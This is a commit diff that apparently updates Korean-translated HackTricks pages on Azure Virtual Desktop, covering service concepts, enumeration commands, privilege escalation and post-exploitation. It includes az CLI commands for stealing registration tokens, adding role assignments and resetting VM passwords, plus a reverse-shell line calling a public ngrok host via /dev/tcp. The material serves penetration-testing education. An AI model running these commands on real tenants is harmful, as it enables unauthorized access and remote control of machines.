Translated ['src/pentesting-cloud/azure-security/az-post-exploitation/az

This commit is contained in:
Translator
2025-02-26 16:11:39 +00:00
parent 42197185be
commit fe426d1e3b
5 changed files with 134 additions and 62 deletions
+2 -1
View File
@@ -454,7 +454,7 @@
- [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md)
- [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
- [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
- [Az - CosmosDB](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
- [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
- [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
- [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
- [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
@@ -465,6 +465,7 @@
- [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md)
- [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md)
- [Az - SQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md)
- [Az - Virtual Desktop Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-virtual-desktop-post-exploitation.md)
- [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md)
- [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
- [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
@@ -0,0 +1,21 @@
# Az - VMs & Network Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Virtual Desktop
Virtual Desktop에 대한 자세한 정보는 다음 페이지를 확인하세요:
{{#ref}}
../az-services/az-virtual-desktop.md
{{#endref}}
### Common techniques
- **저장소 계정의 MSIX 패키지를 덮어쓰기** 하여 해당 앱을 사용하는 모든 VM에서 RCE를 얻습니다.
- 원격 앱에서 **실행할 이진 파일의 경로를 변경**하는 것이 가능합니다.
- **앱에서 쉘로 탈출**하여 RCE를 얻습니다.
- **Azure VMs**에서의 모든 포스트 익스플로잇 공격 및 지속성.
- **풀에서 실행될 스크립트를 구성**하여 사용자 정의 구성을 적용할 수 있습니다.
{{#include ../../../banners/hacktricks-training.md}}
@@ -4,14 +4,24 @@
## Azure Virtual Desktop Privesc
Azure Virtual Desktop에 대한 자세한 내용은 다음을 확인하세요:
{{#ref}}
../az-services/az-virtual-desktop.md
{{#endref}}
### `Microsoft.DesktopVirtualization/hostPools/retrieveRegistrationToken/action`
호스트 풀 내에서 가상 머신을 등록하는 데 사용되는 등록 토큰을 검색할 수 있습니다.
```bash
az desktopvirtualization hostpool retrieve-registration-token -n testhostpool -g Resource_Group_1
```
### ("Microsoft.Authorization/roleAssignments/read", "Microsoft.Authorization/roleAssignments/write") && ("Microsoft.Compute/virtualMachines/read","Microsoft.Compute/virtualMachines/write","Microsoft.Compute/virtualMachines/extensions/read","Microsoft.Compute/virtualMachines/extensions/write")
### Microsoft.Authorization/roleAssignments/read, Microsoft.Authorization/roleAssignments/write
이 권한을 사용하면 가상 데스크톱의 가상 머신에 접근하는 데 필요한 애플리케이션 그룹에 사용자 할당을 추가할 수 있습니다.
> [!WARNING]
> 이러한 권한을 가진 공격자는 이보다 훨씬 더 위험한 일을 할 수 있습니다.
이 권한을 사용하면 가상 데스크톱의 가상 머신에 접근하는 데 필요한 애플리케이션 그룹에 사용자 할당을 추가할 수 있습니다:
```bash
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP_NAME>/providers/Microsoft.DesktopVirtualization/applicationGroups/<APP_GROUP_NAME>/providers/Microsoft.Authorization/roleAssignments/<NEW_ROLE_ASSIGNMENT_GUID>?api-version=2022-04-01" \
@@ -22,12 +32,6 @@ az rest --method PUT \
}
}'
```
또한 가상 머신의 사용자와 비밀번호를 변경하여 접근할 수 있습니다.
```bash
az vm user update \
--resource-group <RESOURCE_GROUP_NAME> \
--name <VM_NAME> \
--username <USERNAME> \
--password <NEW_PASSWORD>
```
사용자가 데스크탑이나 앱에 접근할 수 있으려면, VM에 대해 `Virtual Machine User Login` 또는 `Virtual Machine Administrator Login` 역할이 필요합니다.
{{#include ../../../banners/hacktricks-training.md}}
@@ -12,13 +12,13 @@ Azure Virtual Machines 및 Network에 대한 자세한 정보는 다음을 확
### **`Microsoft.Compute/virtualMachines/extensions/write`**
이 권한은 가상 머신에서 확장을 실행할 수 있게 하 **임의의 코드를 실행할 수 있게 합니다**.\
이 권한은 가상 머신에서 확장을 실행할 수 있게 하며, 이를 통해 **임의의 코드를 실행할 수 있니다**.\
VM에서 임의의 명령을 실행하기 위해 사용자 정의 확장을 악용하는 예:
{{#tabs }}
{{#tab name="Linux" }}
- 리버스 실행
- 리버스 실행
```bash
# Prepare the rev shell
echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
@@ -91,7 +91,7 @@ Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Na
<details>
<summary>VMAccess extension</summary>
<summary>VMAccess 확장</summary>
이 확장은 Windows VM 내의 사용자 비밀번호를 수정(또는 존재하지 않을 경우 생성)할 수 있게 해줍니다.
```bash
@@ -349,8 +349,18 @@ az vm identity assign \
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm
{{#endref}}
### "Microsoft.Compute/virtualMachines/read","Microsoft.Compute/virtualMachines/write","Microsoft.Compute/virtualMachines/extensions/read","Microsoft.Compute/virtualMachines/extensions/write"
이 권한은 가상 머신 사용자와 비밀번호를 변경하여 접근할 수 있도록 허용합니다:
```bash
az vm user update \
--resource-group <RESOURCE_GROUP_NAME> \
--name <VM_NAME> \
--username <USERNAME> \
--password <NEW_PASSWORD>
```
### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action
[**문서**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute)에 따르면, 이 권한은 Windows Admin Center를 통해 리소스의 OS를 관리자 권한으로 관리할 수 있게 해줍니다. 따라서 이는 WAC에 대한 접근을 제공하여 VM을 제어할 수 있게 하는 것 같습니다...
[**문서**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute)에 따르면, 이 권한은 관리자로서 Windows Admin Center를 통해 리소스의 OS를 관리할 수 있게 해줍니다. 따라서 이는 VMs를 제어하기 위해 WAC에 대한 접근을 제공하는 것 같습니다...
{{#include ../../../banners/hacktricks-training.md}}
@@ -4,61 +4,104 @@
## Azure Virtual Desktop
Virtual Desktop는 **데스크탑 및 앱 가상화 서비스**입니다. 이 Windows 11, Windows 10 또는 Windows Server를 포함한 전체 Windows 데스크탑을 사용자에게 원격으로 제공할 수 있게 해주며, 개별 데스크탑 또는 개별 애플리케이션을 통해 제공됩니다. 개인 사용을 위한 단일 세션 설정과 다중 세션 환경을 지원합니다. 사용자는 기본 앱이나 웹 브라우저를 사용하여 사실상 모든 장치에서 연결할 수 있습니다.
Virtual Desktop는 **데스크탑 및 앱 가상화 서비스**입니다. 이를 통해 Windows 11, Windows 10 또는 Windows Server를 포함한 전체 Windows 데스크탑을 개별 데스크탑 또는 개별 애플리케이션을 통해 원격으로 사용자에게 제공할 수 있습니다. 개인 사용을 위한 단일 세션 설정과 다중 세션 환경을 지원합니다. 사용자는 기본 앱이나 웹 브라우저를 사용하여 거의 모든 장치에서 연결할 수 있습니다.
### Host Pools
Azure Virtual Desktop의 호스트 풀은 세션 호스트로 구성된 Azure 가상 머신의 모음으로, 사용자에게 가상 데스크탑과 앱을 제공합니다. 두 가지 주요 유형이 있습니다:
- **개인 호스트 풀**: 각 가상 머신이 단일 사용자에게 전용되며, 각자의 환경을 가집니다.
- **풀 호스트 풀**: 여러 사용자가 사용 가능한 세션 호스트에서 자원을 공유합니다. 구성 가능한 세션 한도가 있으며, 세션 호스트 구성은 Azure Virtual Desktop이 구성에 따라 세션 호스트 생성을 자동화할 수 있게 해줍니다.
모든 호스트 풀에는 **등록 토큰**이 있으며, 이는 호스트 풀 내에서 가상 머신을 등록하는 데 사용됩니다.
- **개인 호스트 풀**: 각 가상 머신이 단일 사용자에게 전용됩니다.
- **관리자가 특정 사용자를 VM에 할당**하거나 **자동으로** 할당하도록 구성할 수 있습니다.
- 각 사용자가 자신의 VM을 가지므로 작업 부하가 많은 사람들에게 이상적입니다. 또한, 파일을 저장하고 OS 디스크에서 설정을 구성할 수 있으며, 이는 **각 사용자가 자신의 VM(호스트)을 가지므로 지속됩니다**.
### Application groups & Workspace
애플리케이션 그룹은 **사용자 접근을 제어**하여 호스트 풀 내의 세션 호스트에서 전체 데스크탑 또는 특정 애플리케이션 세트에 접근할 수 있게 합니다. 두 가지 유형이 있습니다:
- **데스크탑 애플리케이션 그룹**: 사용자가 전체 Windows 데스크탑에 접근할 수 있게 해줍니다(개인 및 풀 호스트 풀 모두에서 사용 가능).
- **RemoteApp 그룹**: 사용자가 개별 게시 애플리케이션에 접근할 수 있게 해줍니다(풀 호스트 풀에서만 사용 가능).
호스트 풀은 하나의 데스크탑 애플리케이션 그룹을 가질 수 있지만 여러 RemoteApp 그룹을 가질 수 있습니다. 사용자는 서로 다른 호스트 풀에서 여러 애플리케이션 그룹에 할당될 수 있습니다. 사용자가 동일한 호스트 풀 내에서 데스크탑 및 RemoteApp 그룹 모두에 할당된 경우, 관리자가 설정한 선호 그룹 유형의 자원만 볼 수 있습니다.
- **공유 호스트 풀**: 여러 **사용자가 사용 가능한 세션 호스트에서 리소스를 공유**합니다.
- 호스트당 **최대 사용자 수**(세션)를 구성할 수 있습니다.
- 등록 키를 사용하여 **VM을 수동으로 추가**하거나, **Azure가 자동으로 호스트 수를 조정**하도록 허용할 수 있습니다. 개인 풀에 대해 VM을 자동으로 조정하는 것은 불가능합니다.
- 사용자 세션에서 파일을 지속하려면 **FSlogix**를 사용해야 합니다.
**워크스페이스**는 **애플리케이션 그룹의 모음**으로, 사용자가 할당된 데스크탑 및 애플리케이션 그룹에 접근할 수 있게 해줍니다. 각 애플리케이션 그룹은 워크스페이스에 연결되어야 하며, 한 번에 하나의 워크스페이스에만 속할 수 있습니다.
### Session Hosts
### Key Features
- **유연한 VM 생성**: Azure 가상 머신을 직접 생성하거나 나중에 Azure Local 가상 머신을 추가할 수 있습니다.
- **보안 기능**: 고급 VM 보안을 위한 Trusted Launch(보안 부팅, vTPM, 무결성 모니터링)를 활성화합니다(가상 네트워크가 필요함). Azure Firewall과 통합하고 네트워크 보안 그룹을 통해 트래픽을 제어할 수 있습니다.
- **도메인 조인**: 사용자 정의 가능한 구성으로 Active Directory 도메인 조인을 지원합니다.
- **진단 및 모니터링**: 진단 설정을 활성화하여 로그 및 메트릭을 Log Analytics, 스토리지 계정 또는 이벤트 허브로 스트리밍하여 모니터링합니다.
- **사용자 정의 이미지 템플릿**: 세션 호스트를 추가할 때 사용할 수 있도록 생성하고 관리합니다. 일반적인 사용자 정의 또는 자체 사용자 정의 스크립트를 쉽게 추가할 수 있습니다.
- **워크스페이스 등록**: 새 또는 기존 워크스페이스에 기본 데스크탑 애플리케이션 그룹을 쉽게 등록하여 사용자 접근 관리를 간소화합니다.
이들은 **사용자가 연결할 VMs**입니다.
- 자동 조정이 선택된 경우, 풀을 위해 생성해야 할 **호스트의 특성**을 가진 템플릿이 생성됩니다.
- 그렇지 않은 경우, 호스트 풀을 생성할 때 **생성할 VM의 특성과 수**를 지정할 수 있으며 Azure가 이를 생성하고 추가합니다.
VM을 **구성하는 주요 기능**은 다음과 같습니다:
- 새 VM의 **접두사** 이름
- **VM 유형**: "Azure 가상 머신"(Azure VM 사용) 또는 "Azure 로컬 가상 머신"으로, 호스트를 온프레미스 또는 엣지에 배포할 수 있습니다.
- 위치, 존, VM 보안 옵션, 이미지, CPU, 메모리, 디스크 크기…
- 인터넷에 노출할 **VNet, 보안 그룹 및 포트**
- 자동으로 **AD 도메인에 가입**할 자격 증명을 설정하거나 Entra ID 디렉토리를 사용할 수 있습니다.
- Entra ID의 경우, **Intune에 새 VM을 자동으로 등록**할 수 있습니다.
- Azure가 호스트를 조정하는 경우를 제외하고는 **관리자 사용자 이름과 비밀번호**를 설정해야 하며, 이 경우 사용자 이름과 비밀번호에 대한 **비밀을 구성해야 합니다**.
- 사용자 정의 구성을 위해 **실행할 스크립트를 구성**할 수 있습니다.
### Application Groups
**애플리케이션 그룹**은 사용자에게 호스트 풀 내의 세션 호스트에서 전체 데스크탑 또는 특정 애플리케이션 세트에 대한 액세스를 제어합니다.
애플리케이션 그룹에는 두 가지 유형이 있습니다:
- **데스크탑 애플리케이션 그룹**: 사용자가 전체 Windows 데스크탑과 연결된 앱에 액세스할 수 있습니다.
- **RemoteApp 그룹**: 사용자가 개별 애플리케이션에 액세스할 수 있습니다.
- 이러한 종류의 애플리케이션 그룹을 개인 풀에 할당하는 것은 불가능합니다.
- VM 내에서 실행할 이진 파일의 경로를 지정해야 합니다.
공유 풀은 **하나의 데스크탑 애플리케이션** 그룹과 **여러 RemoteApp 그룹**을 가질 수 있으며, 사용자는 서로 다른 호스트 풀에 걸쳐 여러 애플리케이션 그룹에 할당될 수 있습니다.
사용자가 **액세스 권한을 부여받으면** 애플리케이션 그룹에 대해 **`Desktop Virtualization User`** 역할이 부여됩니다.
### Workspaces & Connections
**작업 공간**은 애플리케이션 그룹의 모음입니다.
데스크탑 또는 할당된 앱에 **연결**하기 위해 [https://windows365.microsoft.com/ent#/devices](https://windows365.microsoft.com/ent#/devices)에서 할 수 있습니다.
그리고 [https://learn.microsoft.com/en-us/azure/virtual-desktop/users/connect-remote-desktop-client](https://learn.microsoft.com/en-us/azure/virtual-desktop/users/connect-remote-desktop-client)에서 설명된 다른 방법도 있습니다.
사용자가 자신의 계정에 접근하면 **그가 접근할 수 있는 모든 것이 작업 공간별로 구분되어 표시됩니다**. 따라서 정의된 액세스가 보이도록 **각 애플리케이션 그룹을 하나의 작업 공간에 추가**해야 합니다.
사용자가 데스크탑이나 앱에 접근할 수 있으려면 **`Virtual Machine User Login`** 또는 **`Virtual Machine Administrator Login`** 역할이 VM에 대해 필요합니다.
### Managed Identities
호스트 풀에 관리된 ID를 할당할 수 없으므로 풀 내에서 생성된 VM은 이를 가지지 않습니다.
그러나 **VM에 시스템 및 사용자 관리 ID를 할당**하고 메타데이터에서 토큰에 접근할 수 있습니다. 실제로 웹에서 호스트 풀을 시작한 후 생성된 2개의 VM은 시스템 할당 관리 ID가 활성화되어 있습니다(권한은 없습니다).
### Enumeration
```bash
az extension add --name desktopvirtualization
# List HostPool of a Resource group
az desktopvirtualization hostpool list --resource-group <Resource_Group>
# List HostPools
az desktopvirtualization hostpool list
# List Workspaces
az desktopvirtualization workspace list
# List Application Groups
az desktopvirtualization applicationgroup list --resource-group <Resource_Group>
# List Application Groups By Subscription
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/providers/Microsoft.DesktopVirtualization/applicationGroups?api-version=2024-04-03"
az desktopvirtualization applicationgroup list
# List Applications in a Application Group
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/applications?api-version=2024-04-03"
# Check if Desktops are enabled
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/desktops?api-version=2024-04-03"
# List Assigned Users to the Application Group
az rest \
--method GET \
--url "https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP_NAME>/providers/Microsoft.DesktopVirtualization/applicationGroups/<APP_GROUP_NAME>/providers/Microsoft.Authorization/roleAssignments?api-version=2022-04-01" \
| jq '.value[] | select((.properties.scope | ascii_downcase) == "/subscriptions/<subscription_id_in_lowercase>/resourcegroups/<resource_group_name_in_lowercase>/providers/microsoft.desktopvirtualization/applicationgroups/<app_group_name_in_lowercase>")'
# List hosts
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/sessionHosts?api-version=2024-04-03"
# List Workspace in a resource group
az desktopvirtualization workspace list --resource-group <Resource_Group>
# List Workspace in a subscription
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/providers/Microsoft.DesktopVirtualization/workspaces?api-version=2024-04-03"
# List App Attach Package By Resource Group
# List App Attach packages
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/appAttachPackages?api-version=2024-04-03"
# List App Attach Package By Subscription
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/providers/Microsoft.DesktopVirtualization/appAttachPackages?api-version=2024-04-03"
# List user sessions
az rest --method GET --url "https://management.azure.com/ssubscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostpools/{hostPoolName}/sessionhosts/{hostPoolHostName}/userSessions?api-version=2024-04-03"
# List Desktops
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/desktops?api-version=2024-04-03"
@@ -68,34 +111,27 @@ az rest --method GET --url "https://management.azure.com/subscriptions/{subscrip
# List private endpoint connections associated with hostpool.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/privateEndpointConnections?api-version=2024-04-03"
# List private endpoint connections associated By Workspace.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/workspaces/{workspaceName}/privateEndpointConnections?api-version=2024-04-03"
# List the private link resources available for a hostpool.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/privateLinkResources?api-version=2024-04-03"
# List the private link resources available for this workspace.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/workspaces/{workspaceName}/privateLinkResources?api-version=2024-04-03"
# List sessionHosts/virtual machines.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/sessionHosts?api-version=2024-04-03"
# List start menu items in the given application group.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/applicationGroups/{applicationGroupName}/startMenuItems?api-version=2024-04-03"
# List userSessions.
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/sessionHosts/{sessionHostName}/userSessions?api-version=2024-04-03"
# List userSessions By Host Pool
az rest --method GET --url "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DesktopVirtualization/hostPools/{hostPoolName}/userSessions?api-version=2024-04-03"
```
### 연결
웹을 통해 가상 데스크톱에 연결하려면 https://client.wvd.microsoft.com/arm/webclient/ (가장 일반적) 또는 https://client.wvd.microsoft.com/webclient/index.html (클래식)을 통해 접근할 수 있습니다. 다른 방법은 여기에서 설명되어 있습니다 [https://learn.microsoft.com/en-us/azure/virtual-desktop/users/connect-remote-desktop-client?tabs=windows](https://learn.microsoft.com/en-us/azure/virtual-desktop/users/connect-remote-desktop-client?tabs=windows)
## 권한 상승
## 프라이벡스
{{#ref}}
../az-privilege-escalation/az-virtual-desktop-privesc.md
{{#endref}}
## 포스트 익스플로이테이션 & 지속성
{{#ref}}
../az-post-exploitation/az-virtual-desktop-post-exploitation.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}